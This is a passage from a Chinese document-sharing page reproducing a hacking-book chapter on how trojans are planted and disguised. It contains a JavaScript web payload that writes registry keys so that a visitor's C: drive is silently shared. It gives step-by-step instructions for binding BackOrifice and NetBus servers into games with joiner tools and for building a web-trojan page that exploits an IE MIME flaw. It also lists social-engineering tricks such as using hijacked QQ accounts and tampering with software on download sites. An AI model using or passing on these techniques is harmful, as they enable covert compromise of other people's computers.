深度剖析木马的植入与攻击.docx
- 文档编号:24655849
- 上传时间:2023-05-29
- 格式:DOCX
- 页数:60
- 大小:61.38KB
深度剖析木马的植入与攻击.docx
《深度剖析木马的植入与攻击.docx》由会员分享,可在线阅读,更多相关《深度剖析木马的植入与攻击.docx(60页珍藏版)》请在冰豆网上搜索。
深度剖析木马的植入与攻击
深度剖析木马的植入与攻击
安全问题2010-09-1813:
57:
43阅读54评论0 字号:
大中小 订阅
为了学习转的:
第3章深度剖析木马的植入与攻击
●木马是如何实施攻击的
●木马的植入与隐藏
●木马信息反馈
●常用木马例说
●木马的清除和防范
木马,也称特伊洛木马,英文名称为Trojan。
其本身就是为了入侵个人电脑而开发的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵不会在电脑的屏幕上显示出任何痕迹。
Windows本身没有监视网络的软件,所以不借助其它工具软件,许多时候是很难知道木马的存在和黑客的入侵的。
由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该如何清除。
虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现自己是否中“木马”了。
3-1木马是如何实施攻击的
木马是黑客最常用的攻击方法,因此,在本章中将使用较大篇幅来介绍木马的攻防技术。
木马的危害性在于它对电脑系统强大的控制和破坏能力、窃取密码、控制系统操作、进行文件操作等,一台计算机一旦被一个功能强大的木马植入,攻击者就可以像操作自己的计算机一样控制这台计算机,甚至可以远程监控这台计算机上的所有操作。
尽管资深的黑客是不屑于使用木马的,但在对网络安全事件的分析统计里,却发现有相当部分的网络入侵是通过木马来进行的,包括2002年微软被黑一案,据说就是通过一种普通的蠕虫木马侵入微软的系统,并且窃取了微软部分产品源代码的。
3-1-1木马是如何侵入系统的
小博士,你好!
可以给我讲一下木马是如何侵入系统的吗?
没问题,一般的木马都有客户端和服务器端两个执行程序,其中客户端用于攻击者远程控制植入木马的计算机,服务器端程序就是通常所说的木马程序。
攻击者要通过木马攻击计算机系统,他所做的第一步就是要把木马的服务器端程序植入到被攻击的计算机里面。
目前木马入侵的主要途径,还是先通过一定的方法把木马执行档案弄到被攻击者的计算机系统里,如浏览网页、收看邮件、下载信息时,通过一定的提示故意误导被攻击者打开执行档案,比如故意谎称这是个木马执行档案是朋友送给自己贺卡,可能在打开这个档案后,确实有贺卡的画面出现,但这时木马却已经悄悄在自己的后台执行了。
一般的木马执行档案非常小,大多都是几K到几十K,如果把木马连接到正常档案上,是很难发现的,所以有一些网站提供的软件下载往往是连接了木马档案的,在执行这些下载的档案时,也同时执行了木马。
木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式植入,由于微软的IE浏览器在执行Script脚本上存在一些漏洞,攻击者可以利用这些漏洞传播病毒和木马,甚至直接对浏览者计算机进行档案操作等控制,前不久就出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的Html网页。
如果攻击者有办法把木马执行档案上传到攻击计算机的一个可执行WWW目录夹里面,他就可以通过编写CGI程序在攻击计算机上执行木马目录。
木马还可以利用系统的一些漏洞进行植入,如微软著名的IIS服务器溢出漏洞,通过一个IISHACK攻击程序即可使IIS服务器崩溃,并且同时攻击服务器执行远程木马执行档案。
木马在被植入攻击计算机后,它一般会通过一定的方式把入侵计算机的信息发送给攻击者(如计算机的IP地址、木马植入的端口等),这样攻击者有这些信息才能够与木马里应外合,控制攻击计算机。
早期的木马大多都是通过发送电子邮件的方式把入侵信息告诉攻击者,有一些木马档案干脆把计算机所有的密码用邮件的形式通知给攻击者,这样攻击时就不用直接连接被攻击计算机即可获得一些重要数据,如攻击QQ密码的GOP木马即是如此。
使用电子邮件的方式对攻击者来说并不是最好的一种选择,因为如果木马被发现,则可能通过这个电子邮件的地址找出攻击者。
现在还有一些木马采用的是通过发送UDP或者ICMP数据包的方式通知攻击者。
由于任何木马都有一个服务端程序,要对一台目标机进行远程控制都必须将服务端程序送入目标机,并诱骗目标机执行该程序。
这是用木马进行远程控制中的重要一步,也是很有技巧的一步。
3-1-2木马是如何实施攻击的
木马可以以任何形式出现,可能是任何由用户或客户引入到系统中的程序。
其提供或隐藏了一些功能,这些功能可以泄漏一些系统的私有信息或者控制该系统,这样,它实际上就潜伏着很大的危险性。
通常木马采取六个步骤实施攻击。
配置木马(伪装木马)→传播木马(通过E-mail或者下载)→运行木马(自动安装、自启动)→信息泄漏(通过E-mail、IRC或QQ的方式使自己的信息泄露出去)→建立连接→远程控制,如图3-1所示。
图3-1木马攻击的步骤
至此,木马就彻底掌握了主动权,而你,就坐以待毙吧!
3-1-3木马可以造成什么危害
鉴于木马严重的危害,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
1.修改图标
当在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?
但在这里不得不告诉大家,这也有可能是个木马程序。
现在已经有木马可以将木马服务端程序的图标改成HTML、TXT、ZIP等各种文件的图标,这有相当大的迷惑性。
不过目前提供这种功能的木马还不多见,并且这种伪装也不是无懈可击的,所以不必整天提心吊胆、疑神疑鬼。
2.捆绑文件
这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷的进入了系统。
至于被捆绑的文件一般是可执行文件(即EXE、COM一类的文件)。
3.出错显示
有一定木马知识的人都知道:
如果打开一个文件没有任何反应,这很可能就是个木马程序。
木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。
当服务端用户打开木马程序时,会弹出一个错误提示框(这当然是假的),错误内容可自由定义,大多会定制成一些诸如“文件已破坏,无法打开的!
”之类的信息,当服务端用户信以为真时,木马却悄悄侵入了系统。
4.定制端口
很多老式的木马端口都是固定的,这给判断是否感染木马带来了方便,只要查一下特定的端口就知道感染了什么木马。
所以现在很多新式的木马都加入了定制端口的功能,控制端用户可以在1024~65535之间任选一个端口作为木马端口(一般不选1024以下的端口),这样就给判断所感染木马类型带来了麻烦。
5.自我销毁
这项功能是为了弥补木马的一个缺陷。
由于当服务端用户打开含有木马的文件后,木马会将自己拷贝到Windows的系统文件夹中(一般位于C:
\windows\system(Windows9X)或C:
\WINNT\system32(WindowsNT/2000)目录下),一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件,再根据原木马的大小去系统文件夹中查找相同大小的文件,判断一下哪个是木马就行了。
而木马的自我销毁功能是指安装完木马后,原木马文件将自动销毁,这样服务端用户就很难找到木马的来源,在没有查杀木马工具的帮助下,就很难删除木马了。
6.木马重命名
安装到系统文件夹中的木马文件名一般是固定的,那么只要根据一些查杀木马的文章,按图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。
所以,现在有很多木马都允许控制端用户自由定制安装后的木马文件名,这样就很难判断所感染的木马类型了。
3-1-4网页木马制作例说
会使木马的人有成千上万,但是有很多人却不明白应该怎么把木马植入到对方的电脑,随着计算机的普及,在网络上相信很少有人会再轻易地接收对方的文件了,所以网页木马就诞生了。
其实网页木马应该算是HTML带动同路径下一个exe文件的主页,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了。
可以做一个test.html的文件在桌面上,内容如下:
再在桌面上随便找个exe文件,名字一定要改为tset.exe,好了,这时双击刚才生成的HTML文件,当看到“网页加载中,请稍候……”时,就可以看到那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但在申请下了一个个人主页空间,并且把这两个文件上传上去,当试图通过浏览器浏览自己杰作的时候,IE的安全警告就会跳出来,大约是没有几个人愿意乖乖冒着风险去单击【是】按钮的吧!
好了,不管这个网页木马在本地是多么的完美,但是放到了网上就通不过IE的安全策略了,这个小马只好宣告失败。
还有就是通过IE自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、IE标题被改、首页被改、注册表编辑器被禁用等,这些都是自动修改了用户注册表网页的杰作。
所以,也可以做个页面让浏览者的硬盘完全共享,也是做个HTML文件,具体内容如下:
scriptlanguage=javascript>
document.write("");
functionf(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl=a1.GetObject();
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:
\\");
}
functioninit()
{
setTimeout("f()",1000);
}
init();
当对方在浏览过这个页面的时候,他的C:
就被共享了,共享后的进入方法就不用说了,但虽然被共享了,却还不知道谁正在看自己的这个页面,他的IP又是多少,没有关系,有个很简单的方法,去163申请一个域名的转换,如,然后连接到目标地址里就可以了。
这种网页木马的特点是比较安全,并且还不易被对方发现,但是操作起来却比较麻烦,需要牵扯到很多的东西。
3-2木马的植入与隐藏
在Windows系统下,木马可以通过注册表、Win.ini、system.ini、Autoexec.bat和Config.sys、捆绑替换系统文件、启动菜单及程序配置.ini文件来自我启动运行。
①Win.ini:
[WINDOWS]下面,"run="和"load="行是Windows启动时要自动加载运行的程序项目;
②System.ini:
[BOOT]下面有个"shell=Explorer.exe"选项。
正确的表述方法就是这样。
如果等号后面不仅仅是Explorer.exe,而是"shell=Explorer.exe程序名",那么后面跟着的那个程序就是木马程序;
③注册表:
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下面五个以Run开头的主键目录都是系统自启的键值。
当然,还可以通过木马程序一般都是和其他正常的程序捆绑在一起的特性,来侵入别人的主机。
例如把特洛伊木马程序合成在小游戏程序中,当受攻击者下载这个小游戏并将其执行时,木马程序就会在后台悄悄地工作,从而侵入受攻击者的主机。
那这样一来,用户的主机岂不是很危险吗?
尽管如此,在黑客横行的网络世界中,这也是没有办法的事。
唯一能够做的就是尽力维护好自己的系统,安装或升级到最新版的防火墙,了解最前沿的病毒与木马资讯,做好一切防范措施。
下面介绍几种常见的伪装植入的方法。
1.直接发送式欺骗
将木马服务端程序直接发给对方,对方运行后,结果毫无反应(运行木马后的典型表现),对方说:
“怎么打不开呀!
”回答:
“哎呀,不会程序是坏了吧?
”或者说:
“对不起,我发错了!
”然后把正确的东西(正常游戏、图片等)发给对方,他收到后只顾高兴就不想刚才为什么会出现那种情况了。
2.捆绑欺骗
把木马服务端和某个游戏或工具捆绑成一个文件在QQ或邮件中发给别人,别人运行后它们往往躲藏在Windows的系统目录下,图标伪装成一个文本文件或者网页文件,通过端口与外界进行联系。
然后把自己和一些EXE文件捆绑在一起,或者采用改变文件关联方式的方法,来达到自动启动的目的。
而且,即使以后系统重装了,如果该程序还保存着,就还有可能再次中招。
3.文件夹惯性点击
把木马文件伪装成文件夹图标后,放在一个文件夹中,然后在外面再套三四个空文件夹,很多人出于连续点击的习惯,点到那个伪装成文件夹木马时,也会收不住鼠标点下去,这样木马就成功运行了。
4.危险下载点
攻破一些下载站点后,下载几个下载量大的软件,捆绑上木马,再悄悄放回去让别人下载,这样以后每增加一次下载次数,就等于多了一台中木马的计算机。
或者把木马捆绑到其他软件上,然后“正大光明”地发布到各大软件下载网站,它们也不查毒,就算查也查不出一些新木马。
5.邮件冒名欺骗
该类木马植入的前提是,用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件,别人下载附件并运行的话,就中木马了。
6.QQ冒名欺骗
该类木马植入的前提是,必须先拥有一个不属于自己的QQ号。
然后使用这个QQ号码给好友们发去木马程序,由于信任被盗号码的主人,好友们会毫不犹豫地运行木马程序,结果就中招了。
7.ZIP伪装
将一个木马和一个损坏的ZIP包(可自制)捆绑在一起,然后指定捆绑后的文件为ZIP图标,这样一来,除非别人看了他的后缀,否则单击下去将和一般损坏的ZIP没什么两样,根本不知道其实已经有木马在悄悄运行了。
ZIP伪装的常见做法如下:
首先创建一个文本文档,输入任意个字节(其实一个就行,最小)将它的扩展名txt直接改为zip即可,然后把它和木马程序捆绑在一起,修改捆绑后的文件图标为zip图标就可以了。
下面就来主要介绍一下如何把木马程序和其他程序捆绑起来。
3-2-1利用合成工具Exebinder伪装木马
利用Exebinder软件可以把两个可执行程序捆绑成一个程序,执行捆绑后的程序就等于同时执行了两个程序。
而且它会自动更改图标,使捆绑后的程序和捆绑前的程序图标一样,做到天衣无缝,并且还可以自动删除运行时导出的程序文件。
这样就可以把自己的程序和其它软件捆绑起来,使其悄悄地在后台运行。
该软件的使用方法如下:
①运行软件后,单击【可执行文件1】按钮,选择一个程序
(如C:
\PWIN98\NOTEPAD.exe),如图3-2所示;
②单击【可执行文件2】按钮,选择另一个程序(如某远程控制软件的服务端程序D:
\updatev3b6d40.exe),如图3-3所示;
③再单击【目标文件】为捆绑好的文件选择一个路径及文件名(如D:
\Notepad.exe),如图3-4所示,最后直接单击【捆绑】按钮,即可完成捆绑操作了。
之后就可以看到捆绑后的文件,运行
D:
\Notepad.exe即等于同时运行C:
\PWin98\Notepad.exe与D:
\Server.exe两个程序。
图3-2选择一个程序图3-3选择另一个程序
图3-4完成捆绑操作
特别提示:
①应该把被捆绑的程序指定为“执行文件1”,把想捆绑上的程序指定为“执行文件2”,把捆绑后生成的文件指定为“目标文件”。
②软件会自动提取“执行文件1”的图标,使“目标文件”的图标与“执行文件”的图标一样,做到天衣无缝。
③建议将“目标文件”的文件名指定为与“执行文件1”相同,更加具有隐蔽性。
④“执行文件1”、“执行文件2”、“目标文件”三个文件必须指定为三个不同的文件,也就是说“目标文件”不能直接指定为“执行文件1”,软件不能直接对“可执行文件1”进行覆盖。
3-2-2用合成工具ExeJoine伪装木马
黑客最常用的是一个名为“ExeJoiner”的程序,它可以将两个exe文件合并,之后如果一执行这个“混合体”,便会同时执行合拼的两个程序。
因为NetBus的服务器程序在执行后是没有反应的,所以对方只会以为是执行了另一个普通的程序!
简便易行的使用界面让黑客们趋之若鹜,而绝大多数防毒软件还未把它列为病毒,exejoiner可以用来掩饰安装木马的行为,是一件相当危险的黑客工具!
!
!
该文件合成工具ExeJoiner由两个文件组成:
ExeJoiner.exe和pilot.dat,但ExeJoiner工具的两个文件是缺一不可的,当把pilot.dat删除的时候,执行ExeJoiner的合成功能时,程序会提示pilot.dat缺少。
用文件合成工具ExeJoiner伪装木马的方法如下:
①打开ExeJoiner工具,就会出现它的主操作界面。
②在【Exe1path】中单击【Browse】按钮,找出想合拼的文件(例如NetBus的服务器端程序)。
或在【Exe2path】中单击【Browse】按钮,找出想合拼的文件(例如一些小玩意的程序)。
在这里单击第一个【Browse】按钮,打开文件选择对话框。
③在文件选择对话框中选择小游戏程序,单击【打开】按钮,ExeJoiner会给出提示表明第一个可执行文件选择成功。
④用同样的方法,单击第二个【Browse】按钮,选择要合成的第二个可执行文件,这里选择木马BackOrifice2000服务器端的程序,文件名为BO2K.EXE。
⑤选中要合成的两个文件之后,单击ExeJoiner工具界面上的[JOIN]按钮,如果成功合成,则会出现合并提示对话框。
⑥这时就可以在ExeJoiner工具所在的文件夹中看到合成后的可执行文件patched.exe了,该可执行文件合成了一个小游戏程序和BackOrifice2000的服务器端程序。
由于特洛伊木马执行时是没有任何反应的,而防毒软件又不能把它检测出来,所以对方只会以为执行了一普通的程序,中标也就难免了。
据说目前还没有有效的防御方法可以对付它,因此,只有提醒读者注意平时不要打开来历不明的邮件,不要执行可疑的文件,防患于未然。
3-2-3利用万能文件捆绑器伪装木马
万能文件捆绑器可以将多个不同类型(如把a.exe和b.jpg)的文件捆绑成一个可执行文件,运行捆绑后的程序会以当前系统默认的打开方式打开。
并且可以自定义哪个捆绑的文件不打开只释放(如b.exe必须要b.dll这个文件才能运行,那么可以先增加b.dll,再增加b.exe,让b.dll不打开,这样捆绑后就成了一个程序了,且能正常运行);同时可以自定捆绑后程序的图标。
万能文件捆绑器的操作界面如图3-5所示。
图3-5万能文件捆绑器的操作界面
如果单击【增加文件】按钮即可增加要捆绑的文件,然后单击【捆绑文件】按钮将选定的几个文件捆绑成一个程序,这时出现一个保存对话框,生成的文件扩展名可以是.exe、.com、.bat三种类型的文件,如图3-6所示,用户可以根据自己的需要设置保存时的文件名和保存路径,最后点击【保存】按钮即可生成。
图3-6【保存捆绑文件】对话框
当然了,在单击【捆绑文件】按钮之前,用户还可以点击【选择图标】按钮,为自己的捆绑文件指定喜爱的图标。
如果在如图3-5所示中取消“要捆绑的文件”中“打开”前面的“√”,即可将该文件设置为只释放不打开状态。
3-2-4利用合成工具Joine伪装木马
另外的一个合成工具Joine也是由两个文件组成,其中Joiner.exe为该工具的主程序,而Readme.txt则是其说明文件。
使用文件合成工具Joine伪装木马的方法如下:
①需要先双击主程序Joiner.exe,打开主界面。
②在Joiner工具界面的【Firstexecutable】文本框中,输入某个小游戏程序的路径和程序名称。
或者单击文本框右边的文件夹图标,打开【选择文件】对话框,在该对话框中,选择小游戏程序。
③在【Secondfile】下面的文本框中,填入木马程序的路径和程序名称,同样,也可以单击文本框右边的文件夹图标,在【打开】对话框中选择木马程序。
④这时再单击Joiner工具界面的【Join】按钮,程序合并的任务就完成了,这时在Joiner所在的文件夹中就会出现一个result.exe文件,该文件就是由小游戏程序和木马程序合并的新程序,因此可以看到,它的大小比合并前的两个文件中的任何一个都要大。
3-2-5利用网页木马生成器伪装木马
有些黑客喜欢在自己制作的网页上捆绑木马,然后将其上传到网站上,接着到一些论坛或是QQ上大肆宣传自己的网页,诱惑用户去访问。
只要用户访问了这个捆绑了木马的网页,自己就被种上了木马了。
网页木马生成器的使用非常简单,只要选择一个木马文件和一个网页文件就可以进行生成了,如图3-7所示。
具体需要填写的步骤如下:
①打开2004html.exe在第一个栏里填上:
http:
//你的网址/木马文件名。
②在第二栏里填上:
http:
//你的网址/木马文件名.js。
③在第三栏里填上木马文件的大小(这里是按照字节计算大小的,用鼠标在木马文件上按右键点属性就可以看到木马文件的字节了,在填的时候不要加,号。
④单击【生成】按钮之后,就会生成两个文件:
一个JS文件这个不可以重命名,一个newtimes.htm文件,这个可以重命名。
然后把生成的两个文件连同自己的木马文件一起上传到自己的空间就可以了。
当用户点击这个捆绑了木马的网页链接(如网上的一个RAR文件)时,将会同时弹出一个文件下载的对话框,如图3-8所示,如果点击【打开】按钮,将会直接运行木马程序,如果点击【保仔】按钮,保存在某个文件夹后,当用户好奇地以为是什么好东东而点击【打开】按钮时,木马程序也一样会被植入其计算机中。
对于不可信的文件下载,千万不能直接点击【打开】按钮,如果你对此很好奇,可以先保存到本地后,用杀毒软件和木马清除软件扫描无毒后,再打开。
这种方法是利用IE的MIME漏洞,这是2001年黑客中最流行的手法,不过目前有所减少,一方面许多人都改用IE6.0(未打补丁的IE6.0以前版本都存在MIME漏洞);另一方面,大部分个人主页空间都不允许上传.eml文件了。
图3-7网页木马生成器运行主界面图3-8【文件下载】对话框
MIME(MultipurposeInternetMailExtentions),一般译作“多用途的网络邮件扩充协议”。
是一种技术规范,原用于电子邮件,现在也可以用于浏览器。
使用此协议后,IE可以直接播放网页中所包含的声音、动画等,如果木马伪装成这类文件,就可以让浏览者在不知不觉中种上黑客的木马。
3-2-6如何隐藏自己的木马服务器程序
在前面讲过,木马程序的名字通常都与Windows的系统文件名相似,而且通常都隐藏在System32或者Windows目录下,这样做主要是为了迷惑别攻击者。
隐藏木马服务器程序最常用的方法就是对其客户端程序进行设置和修改,从而得到隐藏的
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 深度 剖析 木马 植入 攻击